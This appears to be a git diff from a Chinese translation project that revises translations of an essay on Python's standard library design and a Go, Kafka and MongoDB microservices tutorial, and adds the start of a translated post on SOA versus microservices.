* 在发布之前有一个单独的构建步骤去预处理应用程序,哪怕是把它的这些文件一起打包进一个 Python sdist、wheel 或 zipapp 文档中
|
||||||
* 是否有独立的安装步骤去预处理将要使用的应用程序,取决于应用程序是如何打包的,和支持的目标环境
|
* 是否有独立的安装步骤去预处理将要使用的应用程序,取决于应用程序是如何打包的,和支持的目标环境
|
||||||
* 外部的依赖直接在项目目录中的一个元数据文件中表示(比如,`pyproject.toml`、`requirements.txt`、`Pipfile`),或作为生成的发行包的一部分(比如,`setup.py`、`flit.ini`)
|
* 外部的依赖明确表示为项目目录中的一个元数据文件中,要么是直接在项目的目录中(比如,`pyproject.toml`、`requirements.txt`、`Pipfile`),要么是作为生成的发行包的一部分(比如,`setup.py`、`flit.ini`)
|
||||||
* 存在一个独立的测试套件,或者作为一个 Python API 的一个测试单元、功能接口的集成测试、或者是两者的一个结合
|
* 存在一个独立的测试套件,或者作为一个 Python API 的一个单元测试,或者作为功能接口的集成测试,或者是两者的一个结合
|
||||||
* 静态分析工具的使用是在项目级配置的,作为测试管理的一部分,而不是依赖
|
* 静态分析工具的使用是在项目级配置的,并作为测试管理的一部分,而不是取决于环境
|
||||||
|
|
||||||
作为以上分类的一个结果,CPython 和标准库最终提供的主要用途是,在合适的 CPython 特性发布后 3 - 5 年,为教育和<ruby>临时<rt>ad hoc</rt></ruby>的 Python 脚本环境呈现的功能,定义重新分发的独立基准。
|
作为以上分类的一个结果,CPython 和标准库的主要用途是,在相应的 CPython 特性发布后,为教育和<ruby>临时<rt>ad hoc</rt></ruby>的 Python 脚本环境,最终提供的是定义重分发者假定功能的独立基准 3- 5 年。
|
||||||
|
|
||||||
对于<ruby>临时<rt>ad hoc</rt></ruby>脚本使用的情况,这个 3 - 5 年的延迟是由于新版本重分发给用户的延迟造成的,以及那些再分发版的用户花在修改他们的标准操作环境上的时间。
|
对于<ruby>临时<rt>ad hoc</rt></ruby>脚本使用的情况,这个 3 - 5 年的延迟是由于重分发者给用户制作新版本的延迟造成的,以及那些重分发版本的用户们花在修改他们的标准操作环境上的时间。
|
||||||
|
|
||||||
在教育环境中的情况,教育工作者需要一些时间去评估新特性,和决定是否将它们包含进提供给他们的学生的课程中。
|
在教育环境中的情况是,教育工作者需要一些时间去评估新特性,和决定是否将它们包含进提供给他们的学生的课程中。
|
||||||
|
|
||||||
### 这些相关问题的原因是什么?
|
### 这些相关问题的原因是什么?
|
||||||
|
|
||||||
这篇文章很大程序上是受 Twitter 上对 [我的这个评论][20] 的讨论鼓舞的,它援引了定义在 [PEP 411][21] 中<ruby>临时<rt>Provisional</rt></ruby> API 的情形,作为一个开源项目的例子,对用户发出事实上的邀请,请其作为共同开发者去积极参与设计和开发过程,而不是仅被动使用已准备好的最终设计。
|
这篇文章很大程度上是受 Twitter 上对 [我的这个评论][20] 的讨论鼓舞的,它援引了定义在 [PEP 411][21] 中<ruby>临时<rt>Provisional</rt></ruby> API 的情形,作为一个开源项目的例子,对用户发出事实上的邀请,请其作为共同开发者去积极参与设计和开发过程,而不是仅被动使用已准备好的最终设计。
|
||||||
|
|
||||||
这些回复包括一些在更高级别的库中支持的临时 API 的困难程度的一些沮丧表述,这些库没有临时状态的传递,以及因此而被限制为只有临时 API 的最新版本支持这些相关特性,而没有任何的早期迭代版本。
|
这些回复包括一些在更高级别的库中支持临时 API 的困难程度的一些沮丧性表述、没有这些库做临时状态的传递、以及因此而被限制为只有临时 API 的最新版本才支持这些相关特性,而不是任何早期版本的迭代。
|
||||||
|
|
||||||
我的 [主要反应][22] 是去建议,开源提供者应该努力加强他们需要的有限支持,以加强他们的维护工作的可持续性。这意味着,如果支持老版本的临时 API 是非常痛苦的,然后,只有项目开发人员自己需要时,或者,有人为此支付费用时,他们才会去提供支持。这类似于我的观点,志愿者提供的项目是否应该免费支持老的商业的长周期支持的 Python 版本,这对他们来说是非常麻烦的事,我[不认他们应该去做][23],正如我所期望的那样,大多数这样的需求都来自于管理差劲的、习以为常的惯性,而不是真正的需求(真正的需求,它应该去支付费用来解决问题)
|
我的 [主要回应][22] 是,建议开源提供者应该强制实施有限支持,通过这种强制的有限支持可以让个人的维护努力变得可持续。这意味着,如果对临时 API 的老版本提供迭代支持是非常痛苦的,到那时,只有在项目开发人员自己需要、或有人为此支付费用时,他们才会去提供支持。这与我的这个观点是类似的,那就是,志愿者提供的项目是否应该免费支持老的、商业性质的、长周期的 Python 版本,这对他们来说是非常麻烦的事,我[不认为他们应该去做][23],正如我所期望的那样,大多数这样的需求都来自于管理差劲的、习以为常的惯性,而不是真正的需求(真正的需求,应该去支付费用来解决问题)。
|
||||||
|
|
||||||
然而,我的[第二个反应][24]是,去认识到这一点,尽管多年来一直在讨论这个问题(比如,在上面链接中 2011 的一篇年的文章中,以及在 Python 3 问答的回答中 [在这里][25]、[这里][26]、和[这里][27],和在去年的 [Python 包生态系统][28]上的一篇文章中的一小部分),我从来没有真实尝试直接去解释过它对标准库设计过程中的影响。
|
而我的[第二个回应][24]是去实现这一点,尽管多年来一直在讨论这个问题(比如,在上面链接中最早在 2011 年的一篇的文章中,以及在 Python 3 问答的回复中的 [这里][25]、[这里][26]、和[这里][27],以及去年的这篇文章 [Python 包生态系统][28] 中也提到了一些),但我从来没有真实地尝试直接去解释它在标准库设计过程中的影响。
|
||||||
|
|
||||||
如果没有这些背景,设计过程中的一些方面,如临时 API 的介绍,或者是<ruby>受到不同的启发<rt>inspired-by-not-the-same-as</rt></ruby>的介绍,看起来似乎是很荒谬的,因为它们似乎是在试图标准化 API,而实际上并没有对 API 进行标准化。
|
如果没有这些背景,设计过程中的一部分,比如临时 API 的引入,或者是<ruby>受启发而不同于它<rt>inspired-by-not-the-same-as</rt></ruby>的引入,看起来似乎是完全没有意义的,因为他们看起来似乎是在尝试对 API 进行标准化,而实际上并没有。
|
||||||
|
|
||||||
### 适合进入 PyPI 规划的方面有哪些?
|
### 适合进入 PyPI 规划的方面有哪些?
|
||||||
|
|
||||||
提交给 python-ideas 或 python-dev 的_任何_建议的第一个门槛就是,清楚地回答这个问题,“为什么 PyPI 上的一个模块不够好?”。绝大多数的建议都在这一步失败了,但有几个常见的方面可以考虑:
|
提交给 python-ideas 或 python-dev 的_任何_建议所面临的第一个门槛就是清楚地回答这个问题:“为什么 PyPI 上的一个模块不够好?”。绝大多数的建议都在这一步失败了,为了通过这一步,这里有几个常见的话题:
|
||||||
|
|
||||||
* 大多数新手可能经常是从互联网上去 “复制粘贴” 错误的指导,而不是去下载一个合适的第三方库。(比如,这就是为什么存在 `secrets` 库的原因:它使得人们很少去使用 `random` 模块,因为安全敏感的原因,这是用于游戏和统计模拟的)
|
* 与其去下载一个合适的第三方库,新手一般可能更倾向于从互联网上 “复制粘贴” 错误的指导。(比如,这就是为什么存在 `secrets` 库的原因:它使得人们很少去使用 `random` 模块,由于安全敏感的原因,它预期用于游戏和统计模拟的)
|
||||||
* 这个模块是用于提供一个实现的参考,并去允许与其它的相互竞争的实现之间提供互操作性,而不是对所有人的所有事物都是必要的。(比如,`asyncio`、`wsgiref`、`unittest`、和 `logging` 全部都是这种情况)
|
* 这个模块是打算去提供一个实现的参考,并允许与其它的相互竞争的实现之间提供互操作性,而不是对所有人的所有事物都是必要的。(比如,`asyncio`、`wsgiref`、`unittest`、和 `logging` 全部都是这种情况)
|
||||||
* 这个模块是用于标准库的其它部分(比如,`enum` 就是这种情况,像`unittest`一样)
|
* 这个模块是预期用于标准库的其它部分(比如,`enum` 就是这种情况,像`unittest`一样)
|
||||||
* 这个模块是被设计去支持语言之外的一些语法(比如,`contextlib`、`asyncio` 和 `typing` 模块,就是这种情况)
|
* 这个模块是被设计去支持语言之外的一些语法(比如,`contextlib`、`asyncio` 和 `typing` 模块,就是这种情况)
|
||||||
* 这个模块只是普通的临时的脚本用途(比如,`pathlib` 和 `ipaddress` 就是这种情况)
|
* 这个模块只是普通的临时的脚本用途(比如,`pathlib` 和 `ipaddress` 就是这种情况)
|
||||||
* 这个模块被用于一个教育环境(比如,`statistics` 模块允许进行交互式地探索统计的概念,尽管你不会用它来做全部的统计分析)
|
* 这个模块被用于一个教育环境(比如,`statistics` 模块允许进行交互式地探索统计的概念,尽管你可能根本就不会用它来做全部的统计分析)
|
||||||
|
|
||||||
通过前面的 “PyPI 是不是明显不够好” 的检查,一个模块还不足以确保被接收到标准库中,但它已经足够转变问题为 “在接下来的几年中,你所推荐的要包含的库能否对一般的 Python 开发人员的经验有所改提升?”
|
通过前面的 “PyPI 是不是明显不够好” 的检查,一个模块还不足以确保被接收到标准库中,但它已经足以转变问题为 “在接下来的几年中,你所推荐的要包含的库能否对一般的入门级 Python 开发人员的经验有所提升?”
|
||||||
|
|
||||||
标准库中的 `ensurepip` 和 `venv` 模块的介绍也明确地告诉再分发者,我们期望的 Python 级别的打包和安装工具在任何平台的特定分发机制中都予以支持。
|
标准库中的 `ensurepip` 和 `venv` 模块的引入也明确地告诉再分发者,我们期望的 Python 级别的打包和安装工具在任何平台的特定分发机制中都予以支持。
|
||||||
|
|
||||||
### 当增加它到标准库中时,为什么一些 API 会被改变?
|
### 当添加它们到标准库中时,为什么一些 API 会被改变?
|
||||||
|
|
||||||
现在已经存在的第三方模块有时候会被批量地采用到标准库中,在其它情况下,实际上增加进行的是重新设计和重新实现的 API,只是它参照了现有 API 的用户体验,但是,根据另外的设计参考,删除或修改了一些细节,和附属于语言参考实现部分的权限。
|
现在已经存在的第三方模块有时候会被批量地采用到标准库中,在其它情况下,实际上添加的是吸收了用户对现有 API 体验之后,进行重新设计和重新实现的 API,但是,会根据另外的设计考虑和已经成为其中一部分的语言实现参考来进行一些删除或细节修改。
|
||||||
|
|
||||||
例如,不像第三方库的广受欢迎的前身 `path.py`,`pathlib` 并_没有_定义字符串子类,而是以独立的类型替代。作为解决文件互操作性问题的结果,定义了文件系统路径协议,它允许与文件系统路径一起使用的接口,去使用更大范围的对象。
|
例如,不像广受欢迎的第三方库的前身 `path.py`,`pathlib` 并_没有_定义字符串子类,而是以独立的类型替代。作为解决文件互操作性问题的结果,定义了文件系统路径协议,它允许使用文件系统路径的接口去使用更多的对象。
|
||||||
|
|
||||||
为 `ipaddress` 模块设计的 API 将地址和网络的定义,调整为显式的单独主机接口定义(IP 地址关联到特定的 IP 网络),是为教学 IP 地址概念而提供的一个最佳的教学工具,而最原始的 `ipaddr` 模块中,使用网络术语的方式不那么严格。
|
为了在“IP 地址” 这个概念的教学上提供一个更好的工具,为 `ipaddress` 模块设计的 API,将地址和网络的定义调整为显式的、独立定义的主机接口(IP 地址被关联到特定的 IP 网络),而最原始的 `ipaddr` 模块中,在网络术语的使用方式上不那么严格。
|
||||||
|
|
||||||
在其它情况下,标准库被构建为多种现有方法的一个综合,而且,还有可能依赖于定义现有库的 API 时所不存在的特性。对于 `asyncio` 和 `typing` 模块就有这些考虑因素,虽然后来对 `dataclasses` API 的考虑因素被放到了 PEP 557 (它可以被总结为 “像属性一样,但是使用变量注释作为字段声明”)。
|
另外的情况是,标准库将综合多种现有的方法的来构建,以及为早已存在的库定义 API 时,还有可能依靠不存在的语法特性。比如,`asyncio` 和 `typing` 模块就全部考虑了这些因素,虽然在 PEP 557 中正在考虑将后者所考虑的因素应用到 `dataclasses` API 上。(它可以被总结为 “像属性一样,但是使用可变注释作为字段声明”)。
|
||||||
|
|
||||||
这类改变的工作原理是,这类库不会消失,而且,它们的维护者经常并不关心与标准库相关的限制(特别是,相对缓慢的发行节奏)。在这种情况下,对于标准库版本的文档来说,使用 “See Also” 链接指向原始模块是很常见的,特别是,如果第三方版本提供了标准库模块中忽略的其他特性和灵活性时。
|
这类改变的原理是,这类库不会消失,并且它们的维护者对标准库维护相关的那些限制通常并不感兴趣(特别是,相对缓慢的发行节奏)。在这种情况下,在标准库文档的更新版本中,很常见的做法是使用 “See Also” 链接指向原始模块,尤其是在第三方版本提供了额外的特性以及标准库模块中忽略的那些特性时。
|
||||||
|
|
||||||
### 为什么一些 API 是以临时的形式被增加的?
|
### 为什么一些 API 是以临时的形式被添加的?
|
||||||
|
|
||||||
虽然 CPython 确实设置了 API 的弃用策略,但我们通常不希望在没有令人信服的理由的情况下去使用该策略(在其他项目试图与 Python 2.7 保持兼容性时,尤其如此)。
|
虽然 CPython 维护了 API 的弃用策略,但在没有正当理由的情况下,我们通常不会去使用该策略(在其他项目试图与 Python 2.7 保持兼容性时,尤其如此)。
|
||||||
|
|
||||||
然而,当增加一个受已有的第三方启发去设计的而不是去拷贝的新 API 时,在设计实践中,有些设计实践可能会出现问题,这比平常的风险要高。
|
然而在实践中,当添加这种受已有的第三方启发而不是直接精确拷贝第三方设计的新 API 时,所承担的风险要高于一些正常设计决定可能出现问题的风险。
|
||||||
|
|
||||||
当我们考虑这种改变的风险比平常要高,我们将相关的 API 标记为临时(`provisional`),表示保守的终端用户要避免完全依赖它们,并且,共享抽象层的开发者可能希望考虑,对他们准备支持的临时 API 的版本实施比平时更严格的限制。
|
当我们考虑这种改变的风险比平常要高,我们将相关的 API 标记为临时,表示保守的终端用户要避免完全依赖它们,而共享抽象层的开发者可能希望,对他们准备去支持的那个临时 API 的版本,考虑实施比平时更严格的限制。
|
||||||
|
|
||||||
### 为什么只有一些标准库 API 被升级?
|
### 为什么只有一些标准库 API 被升级?
|
||||||
|
|
||||||
这里简短的回答得到升级的主要 API 有哪些?:
|
这里简短的回答得到升级的主要 API 有哪些?:
|
||||||
|
|
||||||
* 不适合外部因素驱动的补充更新
|
* 不太可能有大量的外部因素干扰的附加更新
|
||||||
* 无论是临时脚本使用情况,还是为促进将来的多个第三方解决方案之间的互操作性,都有明显好处的
|
* 无论是对临时脚本使用案例还是对促进将来多个第三方解决方案之间的互操作性,都有明显好处的
|
||||||
* 对这方面感兴趣的人提交了一个可接受的建议
|
* 对这方面感兴趣的人提交了一个可接受的建议
|
||||||
|
|
||||||
如果一个用于应用程序开发的模块存在一个非常明显的限制,比如,`datetime`,如果重分发版通过替代一个现成的第三方模块有所改善,比如,`requests`,或者,如果标准库的发布节奏与所需要的包之间真的存在冲突,比如,`certifi`,那么,计划对标准库版本进行改变的因素将显著减少。
|
如果一个用于应用程序开发的模块存在一个非常明显的限制,比如,`datetime`,如果重分发者通过可供替代的第三方选择很容易地实现了改善,比如,`requests`,或者,如果标准库的发布节奏与所需要的包之间真的存在冲突,比如,`certifi`,那么,建议对标准库版本进行改变的因素将显著减少。
|
||||||
|
|
||||||
从本质上说,这和关于 PyPI 上面的问题是相反的:因为,PyPI 分发机制对增强应用程序开发人员的体验来说,通常_是_足够好的,这样的改进是有意义的,允许重分发者和平台提供者自行决定将哪些内容作为缺省提供的一部分。
|
从本质上说,这和上面的关于 PyPI 问题正好相反:因为,从应用程序开发人员体验改善的角度来说,PyPI 分发机制通常_是_足够好的,这种分发方式的改进是有意义的,允许重分发者和平台提供者自行决定将哪些内容作为他们缺省提供的一部分。
|
||||||
|
|
||||||
当改变后的能力假设在 3-5 年内缺省出现时被认为是有价值的,才会将这些改变进入到 CPython 和标准库中。
|
假设在 3-5 年时间内,缺省出现了被认为是改变带来的可感知的价值时,才会将这些改变纳入到 CPython 和标准库中。
|
||||||
|
|
||||||
### 标准库任何部分都有独立的版本吗?
|
### 标准库任何部分都有独立的版本吗?
|
||||||
|
|
||||||
@ -160,19 +160,19 @@ Python 是为谁设计的?
|
|||||||
|
|
||||||
最有可能的第一个候选者是 `distutils` 构建系统,因为切换到这种模式将允许构建系统在多个发行版本之间保持一致。
|
最有可能的第一个候选者是 `distutils` 构建系统,因为切换到这种模式将允许构建系统在多个发行版本之间保持一致。
|
||||||
|
|
||||||
这种处理方式的其它可能的候选者是 Tcl/Tk 图形捆绑和 IDLE 编辑器,它们已经被拆分,并且通过一些重分发程序转换成可选安装项。
|
这种处理方式的其它的可能候选者是 Tcl/Tk 图形捆绑和 IDLE 编辑器,它们已经被拆分,并且通过一些重分发程序转换成可选安装项。
|
||||||
|
|
||||||
### 这些注意事项为什么很重要?
|
### 这些注意事项为什么很重要?
|
||||||
|
|
||||||
从最本质上说,那些积极参与开源开发的人就是那些致力于开源应用程序和共享抽象层的人。
|
从本质上说,那些积极参与开源开发的人就是那些致力于开源应用程序和共享抽象层的人。
|
||||||
|
|
||||||
写一些临时脚本和为学生设计一些教学习题的人,通常不会认为他们是软件开发人员 —— 他们是教师、系统管理员、数据分析人员、金融工程师、流行病学家、物理学家、生物学家、商业分析师、动画师、架构设计师等等。
|
那些写一些临时脚本或为学生设计一些教学习题的人,通常不认为他们是软件开发人员 —— 他们是教师、系统管理员、数据分析人员、金融工程师、流行病学家、物理学家、生物学家、商业分析师、动画师、架构设计师等等。
|
||||||
|
|
||||||
当我们所有的担心是,语言是开发人员的经验时,那么,我们可以简单假设人们知道一些什么,他们使用的工具,所遵循的开发流程,以及构建和部署他们软件的方法。
|
对于一种语言,当我们全部的担心都是开发人员的经验时,那么我们就可以根据人们所知道的内容、他们使用的工具种类、他们所遵循的开发流程种类、构建和部署他们软件的方法等假定,来做大量的简化。
|
||||||
|
|
||||||
当一个应用程序运行时(runtime),_也_作为一个脚本引擎广为流行时,事情将变的更加复杂。在一个项目中去平衡两种需求,就会导致双方的不理解和怀疑,做任何一件事都将变得很困难。
|
当一个应用程序运行时(runtime),_也_作为一个脚本引擎广为流行时,事情将变的更加复杂。在同一个项目中去平衡两种受众的需求,将就会导致双方的不理解和怀疑,做任何一件事都将变得很困难。
|
||||||
|
|
||||||
这篇文章不是为了说,我们在开发 CPython 过程中从来没有做出过不正确的决定 —— 它只是指出添加到 Python 标准库中的看上去很荒谬的特性的最合理的反应,它将是 “我不是那个特性的预期目标受众的一部分”,而不是 “我对它没有兴趣,因此,它对所有人都是毫无用处和没有价值的,添加它纯属骚扰我”。
|
这篇文章不是为了说,我们在开发 CPython 过程中从来没有做出过不正确的决定 —— 它只是去合理地回应那些对添加到 Python 标准库中的看上去很荒谬的特性的质疑,它将是 “我不是那个特性的预期目标受众的一部分”,而不是 “我对它没有兴趣,因此它对所有人都是毫无用处和没有价值的,添加它纯属骚扰我”。
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
@ -1,33 +1,33 @@
|
|||||||
Asynchronous Processing with Go using Kafka and MongoDB
|
使用 Kafka 和 MongoDB 进行 Go 异步处理
|
||||||
============================================================
|
============================================================
|
||||||
|
|
||||||
In my previous blog post ["My First Go Microservice using MongoDB and Docker Multi-Stage Builds"][9], I created a Go microservice sample which exposes a REST http endpoint and saves the data received from an HTTP POST to a MongoDB database.
|
在我前面的博客文章 ["使用 MongoDB 和 Docker 多阶段构建我的第一个 Go 微服务][9] 中,我创建了一个 Go 微服务示例,它发布一个 REST 式的 http 端点,并将从 HTTP POST 中接收到的数据保存到 MongoDB 数据库。
|
||||||
|
|
||||||
In this example, I decoupled the saving of data to MongoDB and created another microservice to handle this. I also added Kafka to serve as the messaging layer so the microservices can work on its own concerns asynchronously.
|
在这个示例中,我将保存数据到 MongoDB 和创建另一个微服务去处理它解耦了。我还添加了 Kafka 为消息层服务,这样微服务就可以异步地处理它自己关心的东西了。
|
||||||
|
|
||||||
> In case you have time to watch, I recorded a walkthrough of this blog post in the [video below][1] :)
|
> 如果你有时间去看,我将这个博客文章的整个过程录制到 [这个视频中了][1] :)
|
||||||
|
|
||||||
Here is the high-level architecture of this simple asynchronous processing example wtih 2 microservices.
|
下面是这个使用了两个微服务的简单的异步处理示例的高级架构。
|
||||||
|
|
||||||
![rest-kafka-mongo-microservice-draw-io](https://www.melvinvivas.com/content/images/2018/04/rest-kafka-mongo-microservice-draw-io.jpg)
|
![rest-kafka-mongo-microservice-draw-io](https://www.melvinvivas.com/content/images/2018/04/rest-kafka-mongo-microservice-draw-io.jpg)
|
||||||
|
|
||||||
Microservice 1 - is a REST microservice which receives data from a /POST http call to it. After receiving the request, it retrieves the data from the http request and saves it to Kafka. After saving, it responds to the caller with the same data sent via /POST
|
微服务 1 —— 是一个 REST 式微服务,它从一个 /POST http 调用中接收数据。接收到请求之后,它从 http 请求中检索数据,并将它保存到 Kafka。保存之后,它通过 /POST 发送相同的数据去响应调用者。
|
||||||
|
|
||||||
Microservice 2 - is a microservice which subscribes to a topic in Kafka where Microservice 1 saves the data. Once a message is consumed by the microservice, it then saves the data to MongoDB.
|
微服务 2 —— 是一个在 Kafka 中订阅一个主题的微服务,在这里就是微服务 1 保存的数据。一旦消息被微服务消费之后,它接着保存数据到 MongoDB 中。
|
||||||
|
|
||||||
Before you proceed, we need a few things to be able to run these microservices:
|
在你继续之前,我们需要能够去运行这些微服务的几件东西:
|
||||||
|
|
||||||
1. [Download Kafka][2] - I used version kafka_2.11-1.1.0
|
1. [下载 Kafka][2] —— 我使用的版本是 kafka_2.11-1.1.0
|
||||||
|
|
||||||
2. Install [librdkafka][3] - Unfortunately, this library should be present in the target system
|
2. 安装 [librdkafka][3] —— 不幸的是,这个库应该在目标系统中
|
||||||
|
|
||||||
3. Install the [Kafka Go Client by Confluent][4]
|
3. 安装 [Kafka Go 客户端][4]
|
||||||
|
|
||||||
4. Run MongoDB. You can check my [previous blog post][5] about this where I used a MongoDB docker image.
|
4. 运行 MongoDB。你可以去看我的 [以前的文章][5] 中关于这一块的内容,那篇文章中我使用了一个 MongoDB docker 镜像。
|
||||||
|
|
||||||
Let's get rolling!
|
我们开始吧!
|
||||||
|
|
||||||
Start Kafka first, you need Zookeeper running before you run the Kafka server. Here's how
|
首先,启动 Kafka,在你运行 Kafka 服务器之前,你需要运行 Zookeeper。下面是示例:
|
||||||
|
|
||||||
```
|
```
|
||||||
$ cd /<download path>/kafka_2.11-1.1.0
|
$ cd /<download path>/kafka_2.11-1.1.0
|
||||||
@ -35,14 +35,14 @@ $ bin/zookeeper-server-start.sh config/zookeeper.properties
|
|||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Then run Kafka - I am using port 9092 to connect to Kafka. If you need to change the port, just configure it in config/server.properties. If you are just a beginner like me, I suggest to just use default ports for now.
|
接着运行 Kafka —— 我使用 9092 端口连接到 Kafka。如果你需要改变端口,只需要在 `config/server.properties` 中配置即可。如果你像我一样是个新手,我建议你现在还是使用默认端口。
|
||||||
|
|
||||||
```
|
```
|
||||||
$ bin/kafka-server-start.sh config/server.properties
|
$ bin/kafka-server-start.sh config/server.properties
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
After running Kafka, we need MongoDB. To make it simple, just use this docker-compose.yml.
|
Kafka 跑起来之后,我们需要 MongoDB。它很简单,只需要使用这个 `docker-compose.yml` 即可。
|
||||||
|
|
||||||
```
|
```
|
||||||
version: '3'
|
version: '3'
|
||||||
@ -64,14 +64,14 @@ networks:
|
|||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Run the MongoDB docker container using Docker Compose
|
使用 Docker Compose 去运行 MongoDB docker 容器。
|
||||||
|
|
||||||
```
|
```
|
||||||
docker-compose up
|
docker-compose up
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Here is the relevant code of Microservice 1. I just modified my previous example to save to Kafka rather than MongoDB.
|
这里是微服务 1 的相关代码。我只是修改了我前面的示例去保存到 Kafka 而不是 MongoDB。
|
||||||
|
|
||||||
[rest-to-kafka/rest-kafka-sample.go][10]
|
[rest-to-kafka/rest-kafka-sample.go][10]
|
||||||
|
|
||||||
@ -136,7 +136,7 @@ func saveJobToKafka(job Job) {
|
|||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Here is the code of Microservice 2. What is important in this code is the consumption from Kafka, the saving part I already discussed in my previous blog post. Here are the important parts of the code which consumes the data from Kafka.
|
这里是微服务 2 的代码。在这个代码中最重要的东西是从 Kafka 中消耗数据,保存部分我已经在前面的博客文章中讨论过了。这里代码的重点部分是从 Kafka 中消费数据。
|
||||||
|
|
||||||
[kafka-to-mongo/kafka-mongo-sample.go][11]
|
[kafka-to-mongo/kafka-mongo-sample.go][11]
|
||||||
|
|
||||||
@ -209,51 +209,51 @@ func saveJobToMongo(jobString string) {
|
|||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Let's get down to the demo, run Microservice 1\. Make sure Kafka is running.
|
我们来演示一下,运行微服务 1。确保 Kafka 已经运行了。
|
||||||
|
|
||||||
```
|
```
|
||||||
$ go run rest-kafka-sample.go
|
$ go run rest-kafka-sample.go
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
I used Postman to send data to Microservice 1
|
我使用 Postman 向微服务 1 发送数据。
|
||||||
|
|
||||||
![Screenshot-2018-04-29-22.20.33](https://www.melvinvivas.com/content/images/2018/04/Screenshot-2018-04-29-22.20.33.png)
|
![Screenshot-2018-04-29-22.20.33](https://www.melvinvivas.com/content/images/2018/04/Screenshot-2018-04-29-22.20.33.png)
|
||||||
|
|
||||||
Here is the log you will see in Microservice 1\. Once you see this, it means data has been received from Postman and saved to Kafka
|
这里是日志,你可以在微服务 1 中看到。当你看到这些的时候,说明已经接收到了来自 Postman 发送的数据,并且已经保存到了 Kafka。
|
||||||
|
|
||||||
![Screenshot-2018-04-29-22.22.00](https://www.melvinvivas.com/content/images/2018/04/Screenshot-2018-04-29-22.22.00.png)
|
![Screenshot-2018-04-29-22.22.00](https://www.melvinvivas.com/content/images/2018/04/Screenshot-2018-04-29-22.22.00.png)
|
||||||
|
|
||||||
Since we are not running Microservice 2 yet, the data saved by Microservice 1 will just be in Kafka. Let's consume it and save to MongoDB by running Microservice 2.
|
因为我们尚未运行微服务 2,数据被微服务 1 只保存在了 Kafka。我们来消费它并通过运行的微服务 2 来将它保存到 MongoDB。
|
||||||
|
|
||||||
```
|
```
|
||||||
$ go run kafka-mongo-sample.go
|
$ go run kafka-mongo-sample.go
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Now you'll see that Microservice 2 consumes the data and saves it to MongoDB
|
现在,你将在微服务 2 上看到消费的数据,并将它保存到了 MongoDB。
|
||||||
|
|
||||||
![Screenshot-2018-04-29-22.24.15](https://www.melvinvivas.com/content/images/2018/04/Screenshot-2018-04-29-22.24.15.png)
|
![Screenshot-2018-04-29-22.24.15](https://www.melvinvivas.com/content/images/2018/04/Screenshot-2018-04-29-22.24.15.png)
|
||||||
|
|
||||||
Check if data is saved in MongoDB. If it is there, we're good!
|
检查一下数据是否保存到了 MongoDB。如果有数据,我们成功了!
|
||||||
|
|
||||||
![Screenshot-2018-04-29-22.26.39](https://www.melvinvivas.com/content/images/2018/04/Screenshot-2018-04-29-22.26.39.png)
|
![Screenshot-2018-04-29-22.26.39](https://www.melvinvivas.com/content/images/2018/04/Screenshot-2018-04-29-22.26.39.png)
|
||||||
|
|
||||||
Complete source code can be found here
|
完整的源代码可以在这里找到
|
||||||
[https://github.com/donvito/learngo/tree/master/rest-kafka-mongo-microservice][12]
|
[https://github.com/donvito/learngo/tree/master/rest-kafka-mongo-microservice][12]
|
||||||
|
|
||||||
Shameless plug! If you like this blog post, please follow me in Twitter [@donvito][6]. I tweet about Docker, Kubernetes, GoLang, Cloud, DevOps, Agile and Startups. Would love to connect in [GitHub][7] and [LinkedIn][8]
|
现在是广告时间:如果你喜欢这篇文章,请在 Twitter [@donvito][6] 上关注我。我的 Twitter 上有关于 Docker、Kubernetes、GoLang、Cloud、DevOps、Agile 和 Startups 的内容。欢迎你们在 [GitHub][7] 和 [LinkedIn][8] 关注我。
|
||||||
|
|
||||||
[VIDEO](https://youtu.be/xa0Yia1jdu8)
|
[视频](https://youtu.be/xa0Yia1jdu8)
|
||||||
|
|
||||||
Enjoy!
|
开心地玩吧!
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
via: https://www.melvinvivas.com/developing-microservices-using-kafka-and-mongodb/
|
via: https://www.melvinvivas.com/developing-microservices-using-kafka-and-mongodb/
|
||||||
|
|
||||||
作者:[Melvin Vivas ][a]
|
作者:[Melvin Vivas ][a]
|
||||||
译者:[译者ID](https://github.com/译者ID)
|
译者:[qhwdw](https://github.com/qhwdw)
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
@ -0,0 +1,57 @@
|
|||||||
|
老树发新芽:微服务 – DXC Blogs
|
||||||
|
======
|
||||||
|
![](https://csccommunity.files.wordpress.com/2018/05/old-building-with-modern-addition.jpg?w=610)
|
||||||
|
|
||||||
|
如果我告诉你有这样一种软件架构,一个应用程序的组件通过基于网络的通讯协议为其它组件提供服务,我估计你可能会说它是 …
|
||||||
|
|
||||||
|
是的,确实是。如果你从上世纪九十年代就开始了你的编程生涯,那么你肯定会说它是 [面向服务的架构 (SOA)][1]。但是,如果你是个年青人,并且在云上获得初步的经验,那么,你将会说:“哦,你说的是 [微服务][2]。”
|
||||||
|
|
||||||
|
你们都没错。如果想真正地了解它们的差别,你需要深入地研究这两种架构。
|
||||||
|
|
||||||
|
在 SOA 中,一个服务是一个功能,它是定义好的、自包含的、并且是不依赖上下文和其它服务的状态的功能。总共有两种服务。一种是消费者服务,它从另外类型的服务 —— 提供者服务 —— 中请求一个服务。一个 SOA 服务可以同时扮演这两种角色。
|
||||||
|
|
||||||
|
SOA 服务可以与其它服务交换数据。两个或多个服务也可以彼此之间相互协调。这些服务执行基本的任务,比如创建一个用户帐户、提供登陆功能、或验证支付。
|
||||||
|
|
||||||
|
